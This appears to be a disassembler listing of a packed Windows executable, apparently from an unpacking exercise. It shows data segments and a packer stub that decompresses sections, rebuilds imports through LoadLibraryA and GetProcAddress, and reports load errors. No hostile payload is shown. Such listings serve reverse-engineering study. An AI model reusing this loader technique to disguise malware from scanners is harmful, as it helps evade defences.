off_4E2930 dd offset aCM_unpackerPac ; DATA XREF: sub_42661A+37�w
; "C:\\m_unpacker\\packed.exe"
align 8
byte_4E2938 db 0 ; DATA XREF: sub_41F1B0+2D�w
align 4
dword_4E293C dd 0 ; DATA XREF: sub_41F1B0+27�w
dword_4E2940 dd 0 ; DATA XREF: sub_41F1B0+7�r
; sub_41F1B0+B0�w
dword_4E2944 dd 0 ; DATA XREF: sub_421F4A+14C�w
; sub_422C6E:loc_422C97�w ...
dd 0
dword_4E294C dd 0 ; DATA XREF: sub_41FE1A+F�w
dword_4E2950 dd 0 ; DATA XREF: sub_4201AB+A�r
; sub_4201AB+13�w ...
dword_4E2954 dd 0 ; DATA XREF: start-C31D7�w
; sub_4263E7:loc_4263F9�r ...
dd 0
dword_4E295C dd 0 ; DATA XREF: sub_420CE8�r start-C3221�r ...
dword_4E2960 dd 0 ; DATA XREF: sub_421F2F�r
dword_4E2964 dd 0 ; DATA XREF: sub_41E3C2:loc_41E4CB�r
; sub_41E3C2:loc_41E509�r ...
align 10h
dword_4E2970 dd 1 ; DATA XREF: sub_422F16+19�w
; sub_422F16+21�w ...
dword_4E2974 dd 0 ; DATA XREF: sub_42490B+12�r
; sub_4249FC+1A�r ...
byte_4E2978 db 0 ; DATA XREF: sub_42490B+3�r
; sub_42490B+8D�r ...
align 4
dword_4E297C dd 0 ; DATA XREF: sub_4249FC+11�r
; sub_424AD9+1A�w ...
byte_4E2980 db 0 ; DATA XREF: sub_424AD9+57�w
align 4
dword_4E2984 dd 0 ; DATA XREF: sub_424DD8+32�r
; sub_424DD8+42�w ...
dword_4E2988 dd 0 ; DATA XREF: sub_424DD8+3A�r
; sub_424DD8+4B�w ...
dword_4E298C dd 0 ; DATA XREF: sub_424CB7+15�w
; sub_424D64�r ...
dword_4E2990 dd 0 ; DATA XREF: sub_41FFBA+8D�r
; sub_425165+14�r
dword_4E2994 dd 0 ; DATA XREF: sub_4254B5+C�r
aYnW db 'ynÂw',0
align 10h
dd 0
dword_4E29A4 dd 0 ; DATA XREF: sub_4204DD+20�r
; sub_4204DD:loc_4205AE�r ...
dd 3 dup(0)
dword_4E29B4 dd 0 ; DATA XREF: sub_4204DD+61�r
; sub_4204DD+C3�r ...
dd 0
dword_4E29BC dd 1 ; DATA XREF: sub_425B55+E�r
; sub_425B55+31�w ...
dword_4E29C0 dd 0 ; DATA XREF: sub_4261E0+21�r
dword_4E29C4 dd 0 ; DATA XREF: seg000:00426281�r
; seg000:0042628C�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_42661A+1C�o
; seg002:off_4E2930�o
align 4
dd 3Ah dup(0)
byte_4E2ACC db 0 ; DATA XREF: sub_42661A+23�w
align 10h
dword_4E2AD0 dd 1 ; DATA XREF: sub_4266BC+2�r
; sub_4266BC+24�w ...
dword_4E2AD4 dd 0 ; DATA XREF: sub_421F4A+7�r
dword_4E2AD8 dd 1 ; DATA XREF: sub_426DA0+E�r
; sub_426DA0+2E�w ...
dword_4E2ADC dd 0 ; DATA XREF: sub_426FC0+17�r
word_4E2AE0 dw 0 ; DATA XREF: sub_427FEF+1F�o
; sub_427FEF+4D�r
byte_4E2AE2 db 0 ; DATA XREF: sub_427FEF+41�r
align 4
dword_4E2AE4 dd 6 dup(0) ; DATA XREF: sub_427FEF+5C�o
dword_4E2AFC dd 0 ; DATA XREF: sub_427FEF+48�w
; sub_427FEF+66�o
dword_4E2B00 dd 0 ; DATA XREF: sub_427FEF+54�w
dword_4E2B04 dd 0 ; DATA XREF: sub_427FEF+3C�w
dword_4E2B08 dd 0 ; DATA XREF: sub_427FEF+5C�w
align 10h
dword_4E2B10 dd 0 ; DATA XREF: sub_4284E7:loc_42856E�r
; sub_4284E7+13F�r ...
align 8
dword_4E2B18 dd 0 ; DATA XREF: sub_4284E7:loc_428581�r
; sub_4284E7+1C4�r ...
dd 0Fh dup(0)
dword_4E2B58 dd 0 ; DATA XREF: sub_4284E7+12C�o
; sub_4284E7+191�o ...
dword_4E2B5C dd 0 ; DATA XREF: sub_428710+9�r
; sub_428710+38�w ...
dword_4E2B60 dd 0 ; DATA XREF: sub_428710+4D�w
; sub_428710:loc_4287D5�r
dword_4E2B64 dd 0 ; DATA XREF: sub_428710+5B�w
; sub_428710+D6�r
dword_4E2B68 dd 0 ; DATA XREF: sub_428710+7B�w
; sub_428710:loc_428790�r
dword_4E2B6C dd 0 ; DATA XREF: sub_428710+6C�w
; sub_428710+9C�r
dword_4E2B70 dd 0 ; DATA XREF: sub_426A43+3D�r
dword_4E2B74 dd 0 ; DATA XREF: sub_4292AF:loc_429315�r
; sub_4292AF+6C�o
dword_4E2B78 dd 0 ; DATA XREF: sub_4292AF:loc_4292ED�r
; sub_4292AF+44�o
dword_4E2B7C dd 0 ; DATA XREF: sub_4292AF:loc_4292E0�r
; sub_4292AF+37�o
dword_4E2B80 dd 0 ; DATA XREF: sub_4292AF:loc_4292FA�r
; sub_4292AF+51�o
align 8
dword_4E2B88 dd 0 ; DATA XREF: sub_429B7E+11�r
; sub_429B7E+31�w ...
dword_4E2B8C dd 0 ; DATA XREF: sub_429E31+11�r
; sub_429E31+2E�w ...
dword_4E2B90 dd 1 ; DATA XREF: sub_41FCC0�r sub_4203C0�r ...
dword_4E2B94 dd 1 ; DATA XREF: seg000:0042469F�w
; seg000:004246CA�w
dword_4E2B98 dd 20h ; DATA XREF: sub_420EE9+8�r
; sub_421D41+B�r ...
align 10h
dword_4E2BA0 dd 970650h ; DATA XREF: sub_421C63+74�r
; sub_422124+AC�r ...
dword_4E2BA4 dd 3Fh dup(0) ; DATA XREF: sub_42418E+91�o
dword_4E2CA0 dd 0 ; DATA XREF: sub_422AC2+37�r
; sub_422D61+1A�w ...
dword_4E2CA4 dd 0 ; DATA XREF: sub_422AC2+21�r
; sub_422D61+15�w ...
dd 6 dup(0)
byte_4E2CC0 db 0 ; DATA XREF: sub_422D61+6�o
; sub_422F16+A7�o ...
byte_4E2CC1 db 0 ; DATA XREF: sub_41ED01+5E�r
; sub_422D8A+104�w ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_4E2DC4 dd 4E4h ; DATA XREF: sub_422AC2+40�r
; sub_422D61+10�w ...
align 10h
dword_4E2DD0 dd 4 dup(0) ; DATA XREF: sub_422D61+1F�o
; sub_422F16+162�o ...
byte_4E2DE0 db 0 ; DATA XREF: sub_422D8A:loc_422E9C�w
; sub_422D8A:loc_422EB9�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
dword_4E2EE0 dd 0 ; DATA XREF: sub_421140+21�w
; sub_4211B3+21C�r ...
dword_4E2EE4 dd 0 ; DATA XREF: sub_421140+28�w
; sub_421188�r ...
dword_4E2EE8 dd 0 ; DATA XREF: sub_421140+15�w
; sub_421188+8�r ...
dword_4E2EEC dd 0 ; DATA XREF: sub_41E3C2+58�r
; sub_41E561+E�r ...
dword_4E2EF0 dd 0 ; DATA XREF: sub_421140+2F�w
; sub_4211B3+300�w ...
dword_4E2EF4 dd 0 ; DATA XREF: sub_421140+3C�w
; sub_4214CB+5�r ...
dword_4E2EF8 dd 0 ; DATA XREF: sub_4211B3+229�r
; sub_4211B3+249�r ...
dword_4E2EFC dd 970000h ; DATA XREF: sub_41E2A1+2A�r
; sub_41E3C2+B6�r ...
dword_4E2F00 dd 1 ; DATA XREF: sub_41E2A1+9�r
; sub_41E3C2:loc_41E3F1�r ...
dword_4E2F04 dd 142340h ; DATA XREF: start-C31E1�w
; sub_42638A:loc_42639B�r ...
dword_4E2F08 dd 971080h ; DATA XREF: sub_4220B2+13�r
; sub_4220B2+3F�r ...
dd 5 dup(0)
dword_4E2F20 dd 400h dup(0) ; DATA XREF: seg002:00443500�o
; seg002:00443508�o
dword_4E3F20 dd 200h ; DATA XREF: sub_4220B2+3�r
dword_4E3F24 dd 1 ; DATA XREF: sub_4263E7+9F�w
dword_4E3F28 dd 97075Ch ; DATA XREF: sub_41F1B0+3E�r
; sub_41F1B0:loc_41F202�r ...
dword_4E3F2C dd 970758h ; DATA XREF: sub_41F1B0+34�r
; sub_41F1B0+5A�r ...
dword_4E3F30 dd 1 ; DATA XREF: sub_4230FC�r
; sub_4230FC+11�w ...
align 100h
seg002 ends
; Section 4. (virtual address 000E4000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 000E4000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
seg003 segment para public 'DATA' use32
assume cs:seg003
;org 4E4000h
; =============== S U B R O U T I N E =======================================
public start
start proc near
var_A0 = dword ptr -0A0h
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
; FUNCTION CHUNK AT 00420D0D SIZE 000001A2 BYTES
; FUNCTION CHUNK AT 00420EDA SIZE 0000000F BYTES
pusha
call $+5
pop ebx
lea ebx, [ebx-6]
mov ebp, 400000h
mov edi, [ebp+3Ch]
lea esi, [ebp+edi+0]
lea edi, [esi+0F8h]
movzx esi, word ptr [esi+6]
dec esi
loc_4E4021: ; CODE XREF: start+81�j
mov eax, [edi+10h]
or eax, eax
jz short loc_4E407D
movzx eax, word ptr [edi+22h]
or eax, eax
jz short loc_4E407D
push 4
push 1000h
push dword ptr [edi+10h]
push 0
call dword ptr [ebx+338h]
push eax
push esi
push edi
mov esi, ebp
add esi, [edi+0Ch]
mov ecx, [edi+10h]
mov edi, eax
mov eax, ecx
shr ecx, 2
cld
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop edi
pop esi
mov eax, [esp+0]
mov edx, ebp
add edx, [edi+0Ch]
call sub_4E41AC
pop eax
push 4000h
push dword ptr [edi+10h]
push eax
call dword ptr [ebx+33Ch]
loc_4E407D: ; CODE XREF: start+26�j start+2E�j
add edi, 28h
dec esi
jnz short loc_4E4021
mov esi, 3A800h
or esi, esi
jz loc_4E419C
add esi, ebp
loc_4E4092: ; CODE XREF: start+10C�j
mov ecx, [esi+0Ch]
or ecx, ecx
jz loc_4E419C
add ecx, ebp
mov edi, ecx
push edi
call dword ptr [ebx+330h]
or eax, eax
jnz short loc_4E40E9
push 4
push 1000h
push 1000h
push 0
call dword ptr [ebx+338h]
mov esi, eax
lea eax, [ebx+26Fh]
push edi
push eax
push esi
call dword ptr [ebx+344h]
push 10h
push 0
push esi
push 0
call dword ptr [ebx+348h]
mov ebp, esp
mov eax, 7Eh
jmp dword ptr [esp+2Ch]
; ---------------------------------------------------------------------------
loc_4E40E9: ; CODE XREF: start+AA�j
mov edi, eax
mov ecx, [esi]
or ecx, ecx
jnz short loc_4E40F4
mov ecx, [esi+10h]
loc_4E40F4: ; CODE XREF: start+EF�j
or ecx, ecx
jz loc_4E41A3
add ecx, ebp
mov edx, [esi+10h]
add edx, ebp
loc_4E4103: ; CODE XREF: start+18F�j
mov eax, [ecx]
or eax, eax
jnz short loc_4E410E
add esi, 14h
jmp short loc_4E4092
; ---------------------------------------------------------------------------
loc_4E410E: ; CODE XREF: start+107�j
test eax, 80000000h
jz short loc_4E411C
and eax, 0FFFFh
jmp short loc_4E4121
; ---------------------------------------------------------------------------
loc_4E411C: ; CODE XREF: start+113�j
add eax, ebp
add eax, 2
loc_4E4121: ; CODE XREF: start+11A�j
push eax
push ecx
push edx
push eax
push edi
call dword ptr [ebx+334h]
pop edx
pop ecx
or eax, eax
jnz short loc_4E4184
add ebp, [esi+0Ch]
push 4
push 1000h
push 1000h
push 0
call dword ptr [ebx+338h]
mov esi, eax
pop edi
loc_4E414C: ; DATA XREF: seg001:off_4392B0�o
test edi, 0FFFF0000h
jz short loc_4E415C
lea eax, [ebx+296h]
jmp short loc_4E4162
; ---------------------------------------------------------------------------
loc_4E415C: ; CODE XREF: start+152�j
lea eax, [ebx+2C6h]
loc_4E4162: ; CODE XREF: start+15A�j
push ebp
push edi
push eax
push esi
call dword ptr [ebx+344h]
push 10h
push 0
push esi
push 0
call dword ptr [ebx+348h]
mov ebp, esp
mov eax, 7Fh
jmp dword ptr [esp+30h]
; ---------------------------------------------------------------------------
loc_4E4184: ; CODE XREF: start+130�j
add esp, 4
mov [edx], eax
add ecx, 4
add edx, 4
jmp loc_4E4103
; ---------------------------------------------------------------------------
dd 0E914C683h, 0FFFFFEF6h
; ---------------------------------------------------------------------------
loc_4E419C: ; CODE XREF: start+8A�j start+97�j
popa
push offset loc_420D0D
retn
; ---------------------------------------------------------------------------
loc_4E41A3: ; CODE XREF: start+F6�j
mov ebp, esp
or eax, 0FFFFFFFFh
jmp [esp+0C0h+var_A0]
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4E41AC proc near ; CODE XREF: start+68�p
; FUNCTION CHUNK AT 004E424A SIZE 00000005 BYTES
push ebp
push ebx
push esi
push edi
mov esi, eax
mov edi, edx
cld
mov dl, 80h
xor ebx, ebx
loc_4E41B9: ; CODE XREF: sub_4E41AC+15�j
movsb
mov bl, 2
loc_4E41BC: ; CODE XREF: sub_4E41AC+3A�j
; sub_4E41AC+80�j
call sub_4E422E
jnb short loc_4E41B9
xor ecx, ecx
call sub_4E422E
jnb short loc_4E41E8
xor eax, eax
call sub_4E422E
jnb short loc_4E41F8
mov bl, 2
inc ecx
mov al, 10h
loc_4E41DA: ; CODE XREF: sub_4E41AC+35�j
call sub_4E422E
adc al, al
jnb short loc_4E41DA
jnz short loc_4E4224
stosb
jmp short loc_4E41BC
; ---------------------------------------------------------------------------
loc_4E41E8: ; CODE XREF: sub_4E41AC+1E�j
call sub_4E423A
sub ecx, ebx
jnz short loc_4E4201
call sub_4E4238
jmp short loc_4E4220
; ---------------------------------------------------------------------------
loc_4E41F8: ; CODE XREF: sub_4E41AC+27�j
lodsb
shr eax, 1
jz short loc_4E424A
adc ecx, ecx
jmp short loc_4E421D
; ---------------------------------------------------------------------------
loc_4E4201: ; CODE XREF: sub_4E41AC+43�j
xchg eax, ecx
dec eax
shl eax, 8
lodsb
call sub_4E4238
cmp eax, 7D00h
jnb short loc_4E421D
cmp ah, 5
jnb short loc_4E421E
cmp eax, 7Fh
ja short loc_4E421F
loc_4E421D: ; CODE XREF: sub_4E41AC+53�j
; sub_4E41AC+65�j
inc ecx
loc_4E421E: ; CODE XREF: sub_4E41AC+6A�j
inc ecx
loc_4E421F: ; CODE XREF: sub_4E41AC+6F�j
xchg eax, ebp
loc_4E4220: ; CODE XREF: sub_4E41AC+4A�j
mov eax, ebp
mov bl, 1
loc_4E4224: ; CODE XREF: sub_4E41AC+37�j
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp short loc_4E41BC
sub_4E41AC endp
; =============== S U B R O U T I N E =======================================
sub_4E422E proc near ; CODE XREF: sub_4E41AC:loc_4E41BC�p
; sub_4E41AC+19�p ...
add dl, dl
jnz short locret_4E4237
mov dl, [esi]
inc esi
adc dl, dl
locret_4E4237: ; CODE XREF: sub_4E422E+2�j
retn
sub_4E422E endp
; =============== S U B R O U T I N E =======================================
sub_4E4238 proc near ; CODE XREF: sub_4E41AC+45�p
; sub_4E41AC+5B�p
xor ecx, ecx
sub_4E4238 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4E423A proc near ; CODE XREF: sub_4E41AC:loc_4E41E8�p
inc ecx
loc_4E423B: ; CODE XREF: sub_4E423A+D�j
call sub_4E422E
adc ecx, ecx
call sub_4E422E
jb short loc_4E423B
retn
sub_4E423A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4E41AC
loc_4E424A: ; CODE XREF: sub_4E41AC+4F�j
pop edi
pop esi
pop ebx
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_4E41AC
; ---------------------------------------------------------------------------
align 10h
dd 7 dup(0)
dd 43000000h, 646C756Fh, 746F6E20h, 616F6C20h, 79642064h
dd 696D616Eh, 696C2063h, 6C206B6Eh, 61726269h, 25207972h
dd 68540073h, 72702065h, 6465636Fh, 20657275h, 63207325h
dd 646C756Fh, 746F6E20h, 20656220h, 61636F6Ch, 20646574h
dd 74206E69h, 25206568h, 68540073h, 726F2065h, 616E6964h
dd 7525206Ch, 756F6320h, 6E20646Ch, 6220746Fh, 6F6C2065h
dd 65746163h, 6E692064h, 65687420h, 732520h, 3 dup(0)
dd 0E4350h, 0E4330h, 3 dup(0)
dd 0E439Dh, 0E4344h, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E7980Ah, 77E79E34h, 0
aJWNW db 'jÉÔw×Öw',0
align 10h
aKernel32_dll_1 db 'KERNEL32.DLL',0
db 2 dup(0), 4Ch
aOadlibrarya db 'oadLibraryA',0
dd 47000000h, 72507465h, 6441636Fh, 73657264h, 73h, 72695600h
dd 6C617574h, 6F6C6C41h, 63h, 72695600h, 6C617574h, 65657246h
dd 45535500h, 2E323352h, 4C4C44h, 73770000h, 6E697270h
dd 416674h, 654D0000h, 67617373h, 786F4265h, 41h, 30Fh dup(0)
seg003 ends
; Section 5. (virtual address 000E5000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 000E5000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 4E5000h
align 2000h
_idata2 ends
end start